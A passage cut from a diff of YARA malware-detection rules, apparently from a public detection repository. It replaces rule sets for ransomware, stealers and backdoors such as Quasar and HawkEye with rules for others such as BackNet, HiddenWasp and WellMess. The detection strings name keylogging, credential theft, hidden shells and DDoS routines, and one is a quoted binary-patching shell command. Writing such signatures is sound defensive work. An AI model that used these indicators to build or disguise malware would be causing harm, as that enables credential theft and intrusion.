"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide - $mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide - $ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00 - 74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00 - 73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00 - 65 00 72 00 73 00 65 00 6e } - $ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii + $id1 = "Firebird Remote Administration Tool" fullword wide + $id2 = "Welcome to Firebird! Your system is currently being monitored" wide + $id3 = "Hive Remote Administration Tool" fullword wide + $id4 = "Welcome to Hive! Your system is currently being monitored" wide + $s1 = "REPLACETHESEKEYSTROKES" fullword wide + $s2 = "_ENABLE_PROFILING" fullword wide + $s3 = ": KeylogSubject" wide + $s4 = "Firebird.CommandHandler" fullword wide + $s5 = "webcamenabled" fullword ascii + $s6 = "screenlogs" fullword ascii + $s7 = "encryptedconnection" fullword ascii + $s8 = "monitoron" fullword ascii + $s9 = "screenGrab" fullword ascii + $s10 = "TCP_TABLE_OWNER_PID_ALL" fullword ascii + $s11 = "de4fuckyou" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and (4 of ($s*) or 1 of ($mut*))) or 6 of ($s*) or (1 of ($mut*) and 2 of ($cmd*)) or (1 of ($ext*) and 5 of them )) + uint16(0)==0x5a4d and (1 of ($id*) or 7 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE +rule DITEKSHEN_MALWARE_Win_Phoenix : FILE { meta: - description = "Detects RansomEXX ransomware" - author = "ditekshen" - id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f" - date = "2024-09-06" - modified = "2024-09-06" + description = "Phoenix/404KeyLogger keylogger payload" + author = "ditekSHen" + id = "62101881-9b5e-586d-8e1b-184787f25d6b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2539-L2555" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L341-L367" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b2c2a4ffc36d708a121853fb0268e6dc85b3fe2cd58e05c8124cbef18e03ec0b" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.RansomEXX" + clamav_sig = "MALWARE.Win.Trojan.Phoenix-Keylogger" strings: - $id = "ransom.exx" ascii - $s1 = "!TXDOT_READ_ME!.txt" fullword wide - $s2 = "debug.txt" fullword wide - $s3 = ".txd0t" fullword wide - $s4 = "crypt_detect" fullword wide - $s5 = "powershell.exe" fullword wide - $s6 = "cipher.exe" fullword ascii wide - $s7 = "?ReflectiveLoader@@" ascii + $s1 = "FirefoxPassReader" fullword ascii + $s2 = "StartKeylogger" fullword ascii + $s3 = "CRYPTPROTECT_" ascii + $s4 = "Chrome_Killer" fullword ascii + $s5 = "Clipboardlog.txt" fullword wide + $s6 = "Leyboardlogs.txt" fullword wide + $s7 = "Persistence'" wide + $s8 = "set_HKB" fullword ascii + $s9 = "loloa" fullword ascii + $s10 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" fullword wide + $m1 = "- Screenshot -------|" ascii wide + $m2 = "- Clipboard -------|" ascii wide + $m3 = "- Logs -------|" ascii wide + $m4 = "- Passwords -------|" ascii wide + $m5 = "PSWD" ascii wide + $m6 = "Screenshot |" ascii wide + $m7 = "Logs |" ascii wide condition: - uint16(0)==0x5a4d and (($id and 3 of ($s*)) or all of ($*)) + ( uint16(0)==0x5a4d and 6 of ($s*) or 3 of ($m*)) or 9 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE +rule DITEKSHEN_MALWARE_Win_Backnet : FILE { meta: - description = "Detects Quasar infostealer" - author = "ditekshen" - id = "d0d532fe-bd0a-560a-8570-f6038d694338" - date = "2024-09-06" - modified = "2024-09-06" + description = "BackNet payload" + author = "ditekSHen" + id = "c53ef72f-4957-5ddb-b096-dcdb69cf900d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2557-L2572" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L369-L386" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.QuasarStealer" + clamav_sig = "MALWARE.Win.Trojan.BackNet" strings: - $s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii - $s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii - $s3 = "Process already elevated." fullword wide - $s4 = "get_PotentiallyVulnerablePasswords" fullword ascii - $s5 = "GetKeyloggerLogsDirectory" ascii - $s6 = "set_PotentiallyVulnerablePasswords" fullword ascii - $s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii + $s1 = "Slave.Commands." fullword ascii + $s2 = "StartKeylogger" fullword ascii + $s3 = "StopKeylogger" fullword ascii + $s4 = "KeyLoggerCommand" fullword ascii + $s5 = "get_keyLoggerManager" fullword ascii + $s6 = "get_IgnoreMutex" fullword ascii + $s7 = "ListProcesses" fullword ascii + $s8 = "downloadurl" fullword wide + $pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and ($pdb or all of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Bandook : FILE +rule DITEKSHEN_MALWARE_Win_Acridrain : FILE { meta: - description = "Detects Bandook backdoor" - author = "ditekshen" - id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e" - date = "2024-09-06" - modified = "2024-09-06" + description = "AcidRain stealer payload" + author = "ditekSHen" + id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2676-L2705" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L388-L401" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Bandook" strings: - $s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide - $s2 = "%s\\usd\\dv-%s.dat" fullword ascii - $s3 = "%sprd.dat" fullword ascii - $s4 = "%sfile\\shell\\open\\command" fullword ascii - $s5 = "explorer.exe , %s" fullword ascii - $f1 = "CaptureScreen" fullword ascii - $f2 = "StartShell" fullword ascii - $f3 = "ClearCred" fullword ascii - $f4 = "GrabFileFromDevice" fullword ascii - $f5 = "PutFileOnDevice" fullword ascii - $f6 = "ChromeInject" fullword ascii - $f7 = "StartFileMonitor" fullword ascii - $f8 = "DisableMouseCapture" fullword ascii - $f9 = "StealUSB" fullword ascii - $f10 = "DDOSON" fullword ascii - $f11 = "InstallMac" fullword ascii - $f12 = "SendCam" fullword ascii - $x1 = "RTC-TGUBP" fullword ascii - $x2 = "AVE_MARIA" fullword ascii + $s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) } + $s2 = { 74 65 6d 70 6c 6f 67 69 ?? } + $s3 = { 74 65 6d 70 50 ?? 68 } + $s4 = "Connecting to hostname: %s%s%s" fullword ascii + $s5 = "Found bundle for host %s: %p [%s]" fullword ascii + $s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 6 of ($f*) or (2 of ($s*) and 3 of ($f*)) or ( all of ($x*) and (2 of ($f*) or 3 of ($s*)))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE +rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE { meta: - description = "Detects Kimsuky backdoor" - author = "ditekshen" - id = "6216b874-13f1-5283-9d17-90b7ca6996f8" - date = "2024-09-06" - modified = "2024-09-06" + description = "ChaChaDDoS variant of XorDDoS payload" + author = "ditekSHen" + id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2707-L2730" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L403-L418" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Kimsuky" strings: - $s1 = "Win%d.%d.%dx64" fullword ascii - $s2 = ".zip" fullword ascii - $s3 = ".enc" fullword ascii - $s4 = "&p2=a" fullword ascii - $s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii - $s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii - $s7 = "/?m=b&p1=" fullword ascii - $s8 = "/?m=c&p1=" fullword ascii - $s9 = "/?m=d&p1=" fullword ascii - $s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii - $s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii - $s12 = "GetParent" fullword ascii - $s13 = "DllRegisterServer" fullword ascii - $dll1 = "AutoUpdate.dll" fullword ascii - $dll2 = "dropper-ie64.dll" fullword ascii + $x1 = "[kworker/1:1]" ascii + $x2 = "-- LuaSocket toolkit." ascii + $x3 = "/etc/resolv.conf" ascii + $x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii + $x5 = "easy_attack_dns" ascii + $x6 = "easy_attack_udp" ascii + $x7 = "easy_attack_syn" ascii + $x8 = "syn_probe" ascii condition: - uint16(0)==0x5a4d and ((1 of ($dll*) and 7 of ($s*)) or (11 of ($*))) + uint16(0)==0x457f and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE +rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE { meta: - description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord" + description = "Exaramel Windows/Linux backdoor payload" author = "ditekSHen" - id = "18493e3d-224f-5000-8e44-9ffda9c65cf0" - date = "2024-09-06" - modified = "2024-09-06" + id = "014f10f3-4502-5719-93f6-4b2940f53876" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2732-L2753" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L420-L459" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599" score = 75 - quality = 50 + quality = 73 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.DLAgent03" + clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel" + clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel" strings: - $delph1 = "FastMM Borland Edition" fullword ascii - $delph2 = "SOFTWARE\\Borland\\Delphi" ascii - $v1_1 = "InternetOpenUrlA" fullword ascii - $v1_2 = "CreateFileA" fullword ascii - $v1_3 = "WriteFile" fullword ascii - $v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii - $v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 } - $url1 = "https://discord.com/" fullword ascii - $url2 = "http://www.superutils.com" fullword ascii - $url3 = "http://www.xboxharddrive.com" fullword ascii + $s1 = "vendor/golang_org/x/crypto/" ascii + $s2 = "vendor/golang_org/x/net/http2" ascii + $s3 = "vendor/golang_org/x/text/unicode" ascii + $s4 = "vendor/golang_org/x/text/transform" ascii + $s5 = "config.json" ascii + $cmd1 = "App.Update" ascii + $cmd2 = "App.Delete" ascii + $cmd3 = "App.SetProxy" ascii + $cmd4 = "App.SetServer" ascii + $cmd5 = "App.SetTimeout" ascii + $cmd6 = "IO.WriteFile" ascii + $cmd7 = "IO.ReadFile" ascii + $cmd8 = "OS.ShellExecute" ascii + $cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii + $ws1 = "/commands/@slp" wide + $ws2 = "/commands/cmd" wide + $ws3 = "/settings/proxy/@password" wide + $ws4 = "/settings/servers/server[@current='true']" wide + $ws5 = "/settings/servers/server/@current[text()='true']" wide + $ws6 = "/settings/servers/server[text()='%s']/@current" wide + $ws7 = "/settings/servers/server[%d]" wide + $ws8 = "/settings/storage" wide + $ws9 = "/settings/check" wide + $ws10 = "/settings/interval" wide + $ws11 = "report.txt" wide + $ws12 = "stg%02d.cab" ascii + $ws13 = "urlmon.dll" ascii + $ws14 = "ReportDir" ascii condition: - uint16(0)==0x5a4d and 1 of ($delph*) and 1 of ($url*) and ( all of ($v1*) or 1 of ($v2*)) + ( uint16(0)==0x457f and ( all of ($s*) and 6 of ($cmd*))) or ( uint16(0)==0x5a4d and 12 of ($ws*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Salfram : FILE +rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE { meta: - description = "Detects Salfram executables" + description = "HiddenWasp backdoor payload" author = "ditekSHen" - id = "323e1c8e-2184-5831-9af5-a460c55fbf7c" - date = "2024-09-06" - modified = "2024-09-06" + id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2755-L2766" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L461-L486" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9" score = 75 - quality = 75 + quality = 71 tags = "FILE" - snort2_sid = "920085-920087" - snort3_sid = "920085" - clamav_sig = "MALWARE.Win.Trojan.Salfram" + clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF" + clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script" strings: - $s1 = "!This Salfram cannot be run in DOS mode." fullword ascii + $x1 = "I_AM_HIDDEN" fullword ascii + $x2 = "HIDE_THIS_SHELL" fullword ascii + $x3 = "NewUploadFile" ascii + $x4 = "fake_processname" ascii + $x5 = "swapPayload" ascii + $x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii + $s1 = "FileOpration::GetFileData" fullword ascii + $s2 = "FileOpration::NewUploadFile" fullword ascii + $s3 = "Connection::writeBlock" fullword ascii + $s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii + $s5 = "Reverse-Port" fullword ascii + $s6 = "hidden_services" fullword ascii + $s7 = "check_config" fullword ascii + $s8 = "__data_start" fullword ascii + $s9 = /patch_(suger_lib|ld|lib)/ fullword ascii + $s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp" condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x457f and (4 of ($x*) or all of ($s*) or (3 of ($x*) and 5 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Hawkeyev9 +rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE { meta: - description = "Detects HawkEyeV9 payload" - author = "ditekshen" - id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac" - date = "2024-09-06" - modified = "2024-09-06" + description = "WellMess Windows/Linux backdoor payload" + author = "ditekSHen" + id = "cfa0f077-9d45-5796-b888-66fb397e74f8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2768-L2793" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L488-L510" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5" score = 75 quality = 75 - tags = "" - clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9" + tags = "FILE" + clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet" + clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang" + clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang" strings: - $id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide - $id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide - $str1 = "_PasswordStealer" ascii - $str2 = "_KeyStrokeLogger" ascii - $str3 = "_ScreenshotLogger" ascii - $str4 = "_ClipboardLogger" ascii - $str5 = "_WebCamLogger" ascii - $str6 = "_AntiVirusKiller" ascii - $str7 = "_ProcessElevation" ascii - $str8 = "_DisableCommandPrompt" ascii - $str9 = "_WebsiteBlocker" ascii - $str10 = "_DisableTaskManager" ascii - $str11 = "_AntiDebugger" ascii - $str12 = "_WebsiteVisitorSites" ascii - $str13 = "_DisableRegEdit" ascii - $str14 = "_ExecutionDelay" ascii - $str15 = "_InstallStartupPersistance" ascii + $s1 = "-----BEGIN PUBLIC KEY-----" ascii + $s2 = "-----END PUBLIC KEY-----" ascii + $s3 = "net/http.(*persistConn).readResponse" ascii + $s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii + $s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii + $s6 = "<;head;><;title;>" ascii + $s7 = "<;title;><;service;>" ascii + $s8 = "http://invalidlookup" ascii + $s9 = "<autogenerated>" ascii wide condition: - int16 (0)==0x5a4d and (1 of ($id*) or 5 of ($str*)) + ( uint16(0)==0x457f or uint16(0)==0x5a4d) and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE +rule DITEKSHEN_MALWARE_Win_Konni : FILE { meta: - description = "Detects HyperBro (class names) payload" + description = "Konni payload" author = "ditekSHen" - id = "539b796d-297b-5e2f-84df-282ceaa57bd4" - date = "2024-09-06" - modified = "2024-09-06" + id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2795-L2813" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L512-L530" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.HyperBro" strings: - $s1 = "VTClipboardInfo" ascii wide - $s2 = "VTClipboardMgr" ascii wide - $s3 = "VTFileRename" ascii wide - $s4 = "VTFileRetime" ascii wide - $s5 = "VTKeyboardInfo" ascii wide - $s6 = "VTKeyboardMgr" ascii wide - $s7 = "VTRegeditKeyInfo" ascii wide - $s8 = "VTRegeditMgr" ascii wide - $s9 = "VTRegeditValueInfo" ascii wide - $s10 = "VTFileDataRes" ascii wide + $s1 = "uplog.tmp" fullword wide + $s2 = "upfile.tmp" fullword wide + $s3 = "%s-log-%s" fullword ascii wide + $s4 = "%s-down" ascii wide + $s5 = "%s-file-%s" fullword ascii wide + $s6 = "\"rundll32.exe\" \"%s\" install" fullword wide + $s7 = "subject=%s&data=" fullword ascii + $s8 = "dll-x64.dll" fullword ascii + $s9 = "dll-x32.dll" fullword ascii + $pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii + $pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii condition: - uint16(0)==0x5a4d and 9 of them + uint16(0)==0x5a4d and (7 of ($s*) or (3 of ($s*) and 1 of ($pdb*))) } import "pe" -rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE +rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE { meta: - description = "Detects unknown/unidentified Linux malware" + description = "BitterRAT payload" author = "ditekSHen" - id = "24c6ff35-9378-5a6b-90d1-9740917b1b72" - date = "2024-09-06" - modified = "2024-09-06" + id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2815-L2836" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L532-L551" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b" score = 75 - quality = 75 + quality = 50 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.BitterRAT" strings: - $f1 = "%sresponse.php?status" ascii - $f2 = "%supstream.php?mid=%s&os=%s" ascii fullword - $f3 = "%supstream.php?tid=%" ascii - $f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword - $f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword - $s1 = "lock:%i usable num:%i n:%i" fullword ascii - $s2 = "tid:%.*s tNumber:%i" fullword ascii - $s3 = "init.php" fullword ascii - $s4 = "mod_drone" fullword ascii - $s5 = "new_mid" fullword ascii - $s6 = "&exists[]=" fullword ascii - $s7 = "&mod[]=" fullword ascii - $s8 = "shutdown" fullword ascii - $s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii + $s1 = "getfile" fullword wide + $s2 = "getfolder" fullword wide + $s3 = "winmgmts://./root/default:StdRegProv" fullword wide + $s4 = "winlog" fullword wide + $s5 = "winprt" fullword wide + $s6 = "c:\\intel\\" fullword ascii + $s7 = "AXE: #" fullword ascii + $s8 = "Bld: %s.%s.%s" fullword ascii + $s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase + $pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii + $pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii condition: - uint16(0)==0x457f and (3 of ($f*) or 6 of ($s*)) + uint16(0)==0x5a4d and (7 of ($*) or (4 of ($s*) and 1 of ($pdb*))) } import "pe" -rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE +rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE { meta: - description = "Detects unknown/unidentified Linux malware" + description = "TJKeylogger payload" author = "ditekSHen" - id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca" - date = "2024-09-06" - modified = "2024-09-06" + id = "6aaa11b2-3734-5538-b593-f5276f3acc72" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2838-L2852" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L553-L567" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde" score = 75 quality = 75 tags = "FILE" strings: - $rf1 = "[]A\\A]A^A_" ascii - $rf2 = "[A\\A]A^A_]" ascii - $f1 = "/bin/basH" ascii fullword - $f2 = "/proc/seH" ascii fullword - $f3 = "/dev/ptsH" ascii fullword - $f4 = "pqrstuvwxyzabcde" ascii fullword - $f5 = "libnss_%s.so.%d.%d" ascii fullword + $s1 = "TJKeyLogger" fullword ascii + $s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii + $s3 = "\\Passwords.txt" ascii + $s4 = "TJKeyLogItem" fullword ascii + $s5 = "TJKeyAsyncLog" fullword ascii + $s6 = "FM_GETDSKLST" fullword ascii + $s7 = "KL_GETMODE" fullword ascii condition: - uint16(0)==0x457f and ( all of ($f*) and #rf1>3 and #rf2>3) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE +rule DITEKSHEN_MALWARE_Win_W1RAT : FILE { meta: - description = "Detects iTranslator EXE payload" + description = "W1 RAT payload" author = "ditekSHen" - id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71" - date = "2024-09-06" - modified = "2024-09-06" + id = "d5841bc0-97e7-575e-91f6-d264f507a8b5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2854-L2874" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L569-L585" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e" score = 75 - quality = 50 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE" strings: - $s1 = "\\itranslator\\wintrans.exe" fullword wide - $s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii - $s3 = "\\itranslator\\itranslator.dll" fullword ascii - $s4 = ":Intoskrnl.exe" fullword ascii - $s5 = 